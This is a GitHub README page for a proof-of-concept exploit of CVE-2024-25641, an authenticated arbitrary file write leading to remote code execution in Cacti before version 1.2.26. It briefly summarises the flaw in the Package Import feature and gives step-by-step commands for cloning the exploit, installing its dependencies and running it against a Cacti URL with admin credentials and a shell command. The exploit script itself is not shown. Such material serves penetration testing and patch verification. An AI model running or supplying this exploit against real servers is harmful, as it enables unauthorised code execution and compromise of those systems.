Skip to content

GitHub: https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26
Last Commit: August 30th, 2024


CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵

  •  Authenticated RCE
  •  Cacti version < v1.2.26

Summary


An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).

Proof Of Concept


Usage


git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

With poetry

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

Latest